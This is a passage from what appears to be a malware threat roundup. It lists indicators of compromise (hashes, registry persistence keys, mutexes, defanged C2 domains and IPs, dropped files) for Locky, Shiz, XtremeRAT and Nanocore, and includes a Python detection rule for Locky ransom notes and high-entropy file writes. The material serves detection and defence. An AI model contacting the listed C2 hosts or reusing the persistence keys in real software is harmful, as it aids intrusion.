0eb56bcb11905ba125c5d4e2527fa4441b03f6ce0278269498be539833b5bbe9
1368aa53291ec289ffa8bb86c5ec7c335350a10a240b88e31a3b2d1181fa785f
169b28a24d77797b1c2a61dda32b7d766d6f150bcefdf2333ca635a7b4837778
18465059a485b9f35a472b16d8fec399c795799d3dff1dab57d537e620749902
1c3bde330d7cfe197ecfab80309e463d6e6e61bdf6885d250cb0b08c5f98b767
1cd1a5d2b64aef0c352e7984ae3822c9f6d661d8907526aacd2b6321a4f7a8fd
1d548c85594dc4b83ac1c69ac82da842dc68eac75f683aed693929c728c83184
1fd5e9430201472831856a7720fee930a1555f9b134af3145f1acc5a7f712a82
250c9cf38912e781afc5b32907da411279f7b22b4b2e6b97729aad81a1e0f48a
29ca8b176e9977bf0d3bdc9f214665b89f087ba0799e9d9e22bddfecc4bb7e09
29fbd2e07f2bcdac0a69364621df335bf899787c48353f7e448e302263d0cee1
2e00b1d9d04175dd0a8101ac3222dde48833693400a9684717fddceb532ae258
315ab01236a2ccb7231731878bf7d7fb23d9c6fd9603c7df3501f453f3ec76c1
31bb435f6ce6446d3ce1c97cb80de5084d30abff6fc9711c6d0b0c191031b361
35d9d318da08e7ff963b14fcb2f73fb178374688b21a27ba872f87fb353405eb
377406362d74f2789685c3a0aa128312bf82b092f9c047a36fb1d62e22348a8d
38cd0e89eb7ab0edc2cee7f2edfa86e938a5963ed6ae3212b1c26bf2722cb75a
3921b067ddb8b3fe65e9f8c680f46d72ac52077334cfba1c8ee1192d84bb44cd
395e9fdef9e5694c3a2e8e5ecce9ced85cac141ad2a0d4851620c596ed5eb32a
3cae2eed75c901adbff0fc907433d56f5caeacafade3666eb90b39956add686c
3f72bd0dbdbbb4f9ea83fe224363dc423f8d6f88df526c69431c892938ff2360
40013e1bd081743d85e878edb53179b70546bf6c8ff3ac03f5c0fbf2f590967e
405b9a602c73ce29d1f4e5ab15bf3a5c51a8b087bf6ae7dbf064a48817d1532b
48d7d44420db0625d5d05caf04aac82f3e3daeff65f4d6b9c33cb94c3b939566
*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint (screenshot not reproduced in this text version)

Secure Malware Analytics (screenshot not reproduced in this text version)

MITRE ATT&CK (technique heat map not reproduced in this text version)

Win.Ransomware.Locky-9963624-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 16 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472F-A0FF-E1416B8B2E3A}
Value Name: FaviconPath
16
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472F-A0FF-E1416B8B2E3A}
Value Name: Deleted
16
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES
Value Name: DefaultScope
16
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\VSS\DIAG\VSSAPIPUBLISHER 16
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: LanguageList
16
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43} 16
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @C:\Windows\System32\intl.cpl,-1
1
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @C:\Windows\System32\intl.cpl,-2
1
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @C:\Windows\System32\hgcpl.dll,-2
1
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @C:\Windows\System32\main.cpl,-100
1
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @C:\Windows\System32\main.cpl,-101
1
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @C:\Windows\System32\main.cpl,-102
1
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @C:\Windows\System32\main.cpl,-103
1
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @C:\Windows\System32\devmgr.dll,-4
1
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @C:\Windows\System32\devmgr.dll,-5
1
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @C:\Windows\System32\icardres.dll,-4097
1
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @C:\Windows\System32\icardres.dll,-4098
1
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @C:\Windows\System32\PerfCenterCPL.dll,-2
1
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @C:\Windows\system32\appwiz.cpl,-160
1
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @C:\Windows\System32\netcenter.dll,-2
1
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @C:\Windows\System32\wpccpl.dll,-101
1
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @C:\Windows\System32\autoplay.dll,-1
1
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @C:\Windows\System32\autoplay.dll,-2
1
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @C:\Windows\System32\SyncCenter.dll,-3001
1
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @C:\Windows\System32\recovery.dll,-101
1
Mutexes Occurrences
Global\4aEa7aGa9a4aBa6a4a4aBa1a5a8a4a1a 16
Local\4aEa7aGa9a4aBa6a4a4aBa1a5a8a4a1a 16
Global\C::Users:Administrator:AppData:Local:Microsoft:Windows:Explorer:thumbcache_idx.db!16613a8 16
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
13[.]107[.]21[.]200 10
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
www[.]bing[.]com 16
Files and or directories created Occurrences
\Users\Default\NTUSER.DAT.LOG 16
%ProgramData%\Mozilla\logs\maintenanceservice-install.log 16
%ProgramData%\Sun\Java\Java Update\jaureglist.xml 16
%ProgramData%\Microsoft\RAC\StateData\RacMetaData.dat 16
%ProgramData%\Adobe\Updater6\AdobeESDGlobalApps.xml 16
%ProgramData%\Microsoft\IlsCache\ilrcache.xml 16
%ProgramData%\Microsoft\IlsCache\imcrcache.xml 16
%ProgramData%\Microsoft\User Account Pictures\admin.dat 16
%HOMEPATH%\Desktop\lukitus.bmp 16
%HOMEPATH%\Desktop\lukitus.htm 16
\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\0PZW71P4- 16
\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\0PZW71P4-ZQ0 16
\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\0PZW71P4- 16
\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\0PZW71P4-ZQ0I-J19 16
\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\0PZW71P4- 16
\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\0PZW71P4-ZQ0I-J1 16
\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\0PZW71P4- 16
\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\0PZW71P4-ZQ0I- 16
\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\0PZW71P4- 16
\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\0PZW71P4-ZQ 16
\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\0PZW71P4- 16
\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\0PZW71P4-ZQ0 16
\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.en\0PZW71P4- 16
\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.es\0PZW71P4- 16
\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\0PZW71P4- 16
*See JSON for more IOCs

File Hashes

1afe66e4aaf044636b8bfb0e625e8182a7bb116cfa3b4673ed102094c55b8f84
1cdcb07c8a79bdb3faad6feae4b2720cec8dc8de0cfb1431502f91e8c9152e94
244f76876485ad65f57466338fee2a571057c6315ba9a9699d89ff0add323e72
3140bd4af08e8d487c04c24cb3a6977464ef6bfed46e3f54ba52175b09ceee41
37621fe42fb7154d158b82e54b8735ad876902e8f55178387254689802f8d419
56ee0ae4072920f29e35c10af707ac97bc87ba4191aca1afec235d7a5a96de10
659f0b2aa1699e98b57433d85b08f56fef032fcdce4858cfcf21bb405e784bc2
7af3b8e631e7d557b4039cca14f0f5ad2686b3dab6a81da181ab46e2518b4fcd
8d62a963beb4ac49096277d54d3d6bc78c1142ff30b600b0373256eaa6b7a73c
9be2a26538acb1111657ab79c6680d7f8bde43f5a6e51f38c674967e21d69627
c6f8e43f2db3725ea18520ff3b5370a32ef28c62fe1a82df1575c1003ac10acf
ce8d65f815402e4bc06fade45b66398930ae73d6e5c9368564c87745643703dd
da37a954efc572ccd4f5f43912e1b041acce412d8f4cfac31a23349adb7e43c5
ed96e3c04c7af4bb0863e2e4091e1280ced24a5f68c9712ffba34062d7a46229
f681a28f44ca9a7fe31e4fce8881aafaf125727dafd4db68280cfe6ea6f9e0e8
fdacb9b5a9551464e1bba01a3f279d247c2b3c7d0e4b5768763fcf26bb4e5837

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint (screenshot not reproduced in this text version)

Secure Malware Analytics (screenshot not reproduced in this text version)

MITRE ATT&CK (technique heat map not reproduced in this text version)

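The Locky file list above shows two behaviours worth a rule: the lukitus.htm and lukitus.bmp notes dropped on the Desktop, and a burst of random-looking file names written across many directories (the MSOCache entries). The block below is an added example, not Talos tooling, that scores file-create events for both signals. The event tuples, the process names, the .lukitus extension on the constructed names, the entropy floor and the thresholds are assumptions made for the example.

```python
"""Score processes for Locky-like file activity.  Added example; not Talos tooling.

Built from the Locky IOCs above: the lukitus.htm / lukitus.bmp ransom notes
dropped on the Desktop and the burst of random-looking file names written
under \\MSOCache.  Assumed event shape: (timestamp, process image, created
path) tuples, i.e. a flattened Sysmon EventID 11 feed.
"""
import math
import ntpath
from collections import defaultdict
from datetime import datetime, timedelta

RANSOM_NOTES = {"lukitus.htm", "lukitus.bmp"}   # note names listed in the roundup


def name_entropy(stem: str) -> float:
    """Shannon entropy in bits/char of a file stem.  Random identifiers score
    well above 3; ordinary names such as 'setup' or 'readme' score below."""
    if not stem:
        return 0.0
    counts = defaultdict(int)
    for ch in stem.lower():
        counts[ch] += 1
    n = len(stem)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def score_processes(events, window=timedelta(minutes=2),
                    min_files=8, min_dirs=3, entropy_floor=3.0):
    """Return {image: sorted signals} for processes that dropped a ransom note
    or wrote >= min_files high-entropy names across >= min_dirs directories
    inside `window`.  Either signal alone is worth a look; both together is
    the ransomware pattern."""
    by_image = defaultdict(list)
    for ts, image, path in events:
        by_image[image].append((ts, path))
    findings = {}
    for image, evs in by_image.items():
        evs.sort()
        signals = set()
        if any(ntpath.basename(p).lower() in RANSOM_NOTES for _, p in evs):
            signals.add("ransom_note_dropped")
        for i, (t0, _) in enumerate(evs):            # window anchored at each create
            burst = [p for t, p in evs[i:] if t - t0 <= window]
            odd = [p for p in burst
                   if name_entropy(ntpath.splitext(ntpath.basename(p))[0]) >= entropy_floor]
            if len(odd) >= min_files and len({ntpath.dirname(p).lower() for p in odd}) >= min_dirs:
                signals.add("high_entropy_write_fanout")
                break
        if signals:
            findings[image] = sorted(signals)
    return findings


T0 = datetime(2022, 8, 18, 12, 0, 0)
LOCKY_IMAGE = r"%TEMP%\sample.exe"                  # placeholder image name (assumption)
INSTALLER = r"%ProgramFiles%\Vendor\setup.exe"      # placeholder benign process (assumption)
MSO = r"\MSOCache\All Users"
ENC_DIRS = [MSO + r"\{90140000-0016-0409-0000-0000000FF1CE}-C",
            MSO + r"\{90140000-0018-0409-0000-0000000FF1CE}-C",
            MSO + r"\{90140000-0019-0409-0000-0000000FF1CE}-C",
            MSO + r"\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.en"]
# Constructed stems modelled on the truncated MSOCache fragments above; .lukitus is assumed.
ENC_STEMS = ["0PZW71P4-ZQ0I-J19C-4F1A", "0PZW71P4-ZQ0I-J19C-8B3E", "0PZW71P4-ZQ0I-J19C-2D7F",
             "0PZW71P4-ZQ0I-J19C-6A9C", "0PZW71P4-ZQ0I-J19C-1E5B", "0PZW71P4-ZQ0I-J19C-7C2D",
             "0PZW71P4-ZQ0I-J19C-3F8A", "0PZW71P4-ZQ0I-J19C-9B4E"]
SAMPLE_FILE_EVENTS = [(T0, LOCKY_IMAGE, r"%HOMEPATH%\Desktop\lukitus.htm"),
                      (T0, LOCKY_IMAGE, r"%HOMEPATH%\Desktop\lukitus.bmp")]
SAMPLE_FILE_EVENTS += [(T0 + timedelta(seconds=i), LOCKY_IMAGE,
                        ntpath.join(ENC_DIRS[i % len(ENC_DIRS)], stem + ".lukitus"))
                       for i, stem in enumerate(ENC_STEMS)]
# A benign installer writing ordinary names into one tree must not trip the rule.
SAMPLE_FILE_EVENTS += [(T0 + timedelta(seconds=i), INSTALLER, ntpath.join(r"%ProgramFiles%\Vendor", n))
                       for i, n in enumerate(["setup.log", "config.xml", "readme.txt", "vendor.dll",
                                              "license.rtf", "uninstall.exe", "resources.pak", "help.chm"])]

if __name__ == "__main__":
    for image, hits in score_processes(SAMPLE_FILE_EVENTS).items():
        print(image, "->", ", ".join(hits))
```

The entropy floor is the weak part of this rule: long natural-language names also score above 3 bits per character, which is why the fan-out condition (many files, many directories, short window) is required before the signal fires. Tune the thresholds against a week of baseline file-create telemetry before alerting on it.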
Win.Dropper.Shiz-9963681-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 21 samples
Registry Keys Occurrences
<HKLM>\SOFTWARE\MICROSOFT
Value Name: 67497551a
21
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: 98b68e3c
21
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: userinit
21
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: System
21
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS
Value Name: load
21
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS
Value Name: run
21
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: userinit
21
Mutexes Occurrences
Global\674972E3a 21
Global\MicrosoftSysenterGate7 21
internal_wutex_0x000004b4 21
internal_wutex_0x0000043c 21
internal_wutex_0x<random, matching [0-9a-f]{8}> 21
internal_wutex_0x000004dc 20
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
13[.]107[.]21[.]200 15
45[.]33[.]30[.]197 7
45[.]33[.]23[.]183 5
96[.]126[.]123[.]244 4
45[.]56[.]79[.]23 4
45[.]33[.]2[.]79 4
45[.]79[.]19[.]196 3
45[.]33[.]20[.]235 3
72[.]14[.]185[.]43 3
198[.]58[.]118[.]167 2
45[.]33[.]18[.]44 2
173[.]255[.]194[.]134 2
72[.]14[.]178[.]174 2
85[.]94[.]194[.]169 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
rynikulokop[.]eu 21
lyvoguraxeh[.]eu 21
xuxetiryqem[.]eu 21
puzewilurip[.]eu 21
cilynitiseg[.]eu 21
vojizitoken[.]eu 21
fogokozazit[.]eu 21
gadedozymiz[.]eu 21
masytoturen[.]eu 21
nofagoteveg[.]eu 21
jepuqoxupit[.]eu 21
qetunopifef[.]eu 21
kericoxojil[.]eu 21
ryqozapaleb[.]eu 21
lymajaxecir[.]eu 21
xubysaxywil[.]eu 21
dixonesohed[.]eu 21
marawukyqos[.]eu 21
dikuvizigiz[.]eu 21
puvutaputeb[.]eu 21
ciciqacidir[.]eu 21
ryhuneqevyv[.]eu 21
kejywajazok[.]eu 21
xudakejupok[.]eu 21
lygivejynow[.]eu 21
*See JSON for more IOCs
Files and/or directories created Occurrences
%TEMP%\<random, matching [A-F0-9]{1,4}>.tmp 21

File Hashes

0ddc226c722e18199274ea9f05f0bebdfd0e871713b53e89dc094fd53fbf21fb 12fbf08de48d56346c43dfc4369e7c70c71023e7322f84991591fcde46aa5532 1b56b352ab8e26ce29fabdc5ce020e616db96b6004ee540e88fef580b16a4f78 1d65fa03284d71963c8ec3cee40b25afdc06d9f6f6404d214ca0091c0130cb53 232a41bbdda2fe1b5e7b90c7beb1136b671d127a400699b6591278c44eb828a2 3a7f6106cbe35dcd0c7f25bb6c4b1fc9c19eb348cafba007121f03e74c6d73e2 4d0d263dc8c8f69d6cbcfb13564f53d70955772552e9a4e32aa5a14851bdd1ac 4dfcf95c402c12d20034ac961076c2772f835a9aa442d7062b914a2f53f37f9b 5077b57947941ef15fb8445db7819e641fd5499067969e38f680d2cb6f6430a0 54b0b511221b0498f1c5a2eeb0e2ae633cae232cf75c13fa9eaff6f711cebef1 5b0787632726f2d55a209f853f04eea8109d87cd9630be7e8a42a384bd8cb7a5 6820579b06e8cb0e4298270a497b475baf2645430b4c62d4a3e22f4d7c7bc0ee 69b5080868bfbdc18d868318cb6be406c4cc268fe4e183e5e81f62c7e6922fd9 69e5f2613c4aad5956e83985743210ae058862c12e3d7f104537f6efd0aa1c51 7324bb74d697cb54b2acfa41ab0caab30a14e40b8628b50acdfd4d26b1dfba17 7807700902786f550ce24bb63e93e62e35527857a24f2b655467dd243c40e5d3 79c880d0a639206d2ad9a77647940b11b9200680431e98fc155410f855354be8 85b1e95b8a1be8d5a16525b879d9e8e9a7a1f491449d036f08504b9e9f118b96 91c02affdcd16a87eb278a461fdabaa021ab4d5b7987a24d162563012ba49bcc a38da3b0920e292f513272bfe95c0d5debd6e201cb63d2526fe25c6293b8ed0e d19619fd50ebefcc45deb67abe2d2aab162806fcfd41db0765c7ddf96cdb02b9

Coverage

Product                   Protection
Secure Endpoint           This has coverage
Cloudlock                 N/A
CWS                       This has coverage
Email Security            This has coverage
Network Security          This has coverage
Stealthwatch              N/A
Stealthwatch Cloud        N/A
Secure Malware Analytics  This has coverage
Umbrella                  This has coverage
WSA                       This has coverage

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Dropper.XtremeRAT-9963701-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 12 samples
Registry Keys Occurrences
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: LanguageList
9
<HKCU>\SOFTWARE\<random, matching '[a-zA-Z0-9]{5,9}'> 9
<HKCU>\SOFTWARE\<random, matching '[a-zA-Z0-9]{5,9}'>
Value Name: InstalledServer
8
<HKCU>\SOFTWARE\<random, matching '[a-zA-Z0-9]{5,9}'>
Value Name: ServerStarted
7
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: HKLM
6
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: HKCU
6
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{5460C4DF-B266-909E-CB58-E32B79832EB2} 4
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{5460C4DF-B266-909E-CB58-E32B79832EB2}
Value Name: StubPath
4
<HKCU>\SOFTWARE\((MUTEX)) 3
<HKCU>\SOFTWARE\((MUTEX))
Value Name: InstalledServer
3
<HKCU>\SOFTWARE\((MUTEX))
Value Name: ServerStarted
3
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: HKLX
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: HKCL
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS
Value Name: StubPath
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{7OFBR713-LB7J-5G81-7WC8-161211U08C56}
Value Name: StubPath
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{7OFBR713-LB7J-5G81-7WC8-161211U08C56} 2
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @C:\Windows\system32\DeviceCenter.dll,-2000
1
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @explorer.exe,-7001
1
<HKCU>\SOFTWARE\XTREMERAT
Value Name: TDados
1
<HKCU>\SOFTWARE\SS 1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{11AKP4MN-X763-4313-1615-X6G4IX7N4S25} 1
<HKCU>\SOFTWARE\SS
Value Name: ServerStarted
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{M0J1AY7S-64N4-SUDU-RQ0E-5HNUA5PF0MI0} 1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ss
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ss
1
Mutexes Occurrences
XTREMEUPDATE 12
<random, matching [a-zA-Z0-9]{5,9}> 9
<random, matching [a-zA-Z0-9]{5,9}>PERSIST 8
<random, matching [a-zA-Z0-9]{5,9}EXIT> 8
((Mutex)) 3
((Mutex))PERSIST 2
((Mutex))EXIT 2
STUBXTREMEINJECTED 1
ss 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
dstar[.]hopto[.]org 1
may00[.]zapto[.]org 1
Files and/or directories created Occurrences
%TEMP%\x.html 10
%APPDATA%\Microsoft\Windows\<random, matching '[a-zA-Z0-9]{5,9}'>.cfg 8
%APPDATA%\Microsoft\Windows\((Mutex)).cfg 3
%SystemRoot%\InstallDir 2
%APPDATA%\InstallDir 2
%APPDATA%\InstallDir\dll.exe 2
%SystemRoot%\InstallDir\Server.exe 1
%ProgramFiles(x86)%\ISSA.exe 1
%ProgramFiles(x86)%\ss.exe 1
%APPDATA%\Microsoft\Windows\ss.cfg 1
%APPDATA%\Microsoft\Windows\ss.dat 1
%APPDATA%\Microsoft\Windows\SpUDj.dat 1
%SystemRoot%\GOOGLE.exe 1
%APPDATA%\windoy.exe 1
%SystemRoot%\SysWOW64\windoy.exe 1
%APPDATA%\soft.exe 1
%SystemRoot%\SysWOW64\soft.exe 1
%SystemRoot%\InstallDir\browse.exe 1
%SystemRoot%\SysWOW64\migc.exe 1
%APPDATA%\migc.exe 1
%SystemRoot%\CREATE.exe 1

File Hashes

00c5b7cc78f982e42062c84a8a5c1c5aaeea7276b0f00635d61e4bfdcf6ed4b2 05316395bee1b9759134e86ecf28413d197c95cc6c25bb96a3fd957adfb767fe 10f0a0f8b51964b8a3fc497040601a48fe0493a7e4010ee89e61068cc8e2d92d 33ed0e091cc5ccc71d0a9d37c4f82d73f3959ffcd55f9c2f8660e7e13f68393e 3e5302bb99e282cd9303eda70e64589529704b3c2edee6637cb040887b02f42f 593d60c61df90a5de77d5ee31815eafd3c2657f1581cdd7fe36e74f72956a7e3 62243f0a6f197f167173d12b985b2bbd4a8f98864eb4f99c77e28a9f561f4b0d 6798aa4e8218c8783acab06e700b519eb31856ac0e46c6c82f5dfbf22e13ddb5 9906c6c6ce2eb7199023bbfcff346303f08dab61f475da22fe358f0e09d083bd c11cd59cb06cf9e1a9f95e3d78300a2aa8edf94ed7964b73ccb7135a5b23a7d6 d20e8dd51f00f03a0aacfcc4989d86411e2bc6c6f0a91961f420a056a86eef07 d8df5b44e3469d7a7c0ffc4dba88d34bff093cf4453500074a54b837d50d93c6

Coverage

Product                   Protection
Secure Endpoint           This has coverage
Cloudlock                 N/A
CWS                       This has coverage
Email Security            This has coverage
Network Security          N/A
Stealthwatch              N/A
Stealthwatch Cloud        N/A
Secure Malware Analytics  This has coverage
Umbrella                  N/A
WSA                       N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Dropper.Nanocore-9963905-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 20 samples
Registry Keys Occurrences
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: LanguageList
9
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: jVULYR
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: AGP Manager
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: WGmLd
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ddnKQs
1
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @explorer.exe,-7001
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: capsole
1
Mutexes Occurrences
8-3503835SZBFHHZ 1
NL20T01E6BXGZI09 1
fKZhNqRta 1
Global\{bbc5d79f-8cc7-4aa7-b9fa-0c15cee443cd} 1
GfAQbAoN 1
GZVlUzSZeINZ 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
149[.]154[.]167[.]220 2
208[.]91[.]199[.]224 1
208[.]91[.]198[.]143 1
208[.]91[.]199[.]223 1
205[.]134[.]234[.]70 1
107[.]182[.]129[.]128 1
162[.]0[.]229[.]41 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
api[.]telegram[.]org 2
mail[.]albacon-ojeda[.]pe 1
smtp[.]saudlunion[.]com 1
smtp[.]transmase[.]com 1
smtp[.]utt-ae[.]com 1
brightnano1[.]ddns[.]net 1
mail[.]fasttunpcbs[.]com 1
Files and/or directories created Occurrences
%System32%\Tasks\Updates 6
%TEMP%\tmp<random, matching [A-F0-9]{1,4}>.tmp 6
%System32%\drivers\etc\hosts 3
%APPDATA%\jVULYR 2
%APPDATA%\jVULYR\jVULYR.exe 2
%ProgramFiles(x86)%\AGP Manager 1
%ProgramFiles(x86)%\AGP Manager\agpmgr.exe 1
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5 1
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\Logs 1
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\Logs\Administrator 1
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\run.dat 1
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\task.dat 1
%System32%\Tasks\AGP Manager 1
%System32%\Tasks\AGP Manager Task 1
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\catalog.dat 1
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\settings.bin 1
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\storage.dat 1
%APPDATA%\WGmLd 1
%APPDATA%\WGmLd\WGmLd.exe 1
%APPDATA%\ddnKQs 1
%APPDATA%\ddnKQs\ddnKQs.exe 1
%APPDATA%\HFkIOmiwFQY.exe 1
%System32%\Tasks\Updates\HFkIOmiwFQY 1
%APPDATA%\h0gct1lm.mo4 1
%APPDATA%\h0gct1lm.mo4\Firefox 1
*See JSON for more IOCs

File Hashes

1f41465839f9e90dc6298156eb0f0eab361414c1dc207c22e2593e608dc6f5d5 28d4e2a68e9b5db5a71cbd94fcaa241dfd1937e99eadbddab572ff4efab999d7 2b61ef6e2d493e4eb8bd0ce74d2cf9fb7de72245ec0e76afe9198b9518f2cb40 2c04f3b128381e4f3e3687566623fd653d7a211dfdd17efd94317bebaae1b78b 35157e080e4f612ef306a1195e55ce5068844cc7daf3442d0f73c98c224d4c9d 35ad1d5553d61763b2e94c6e4d66cd5b6cba0578736f202a12c88525b9125804 420c5ccde64ea630f1223e27d1cae8b0887aca1a4e87d6f9c307011c0e266bf9 43f5c35dc913dbd764a028b5686d0a3c47bcb745c3b277b778742e22989784ca 46675d5b6e4c352b50804c760bf4ef3174a8ef93b875f1b7e0f343e22573a6c5 6b4bbd2e534c8e089691829e219ea54c8e113012f1ecb6d912a5d791c7157c2e 7605008ef9c187be6862403b9a5eef21eb271ff656db288759a50dc3785caeeb 76b3123c5245713b390b8f28fafddddef75a55199621a196124e9c55ac55d1af 878a27d70fd8b04b70298f1e102053e02faeaab461a8455fdf843262118231ad 9238603739f090fa4b311ab4c76739c1b54d21e410139c6be208025b4dd7a33f a2631bee5c6505f12449f250e56d2091a50fd25d876ad49efefeb4ea7f63e45d 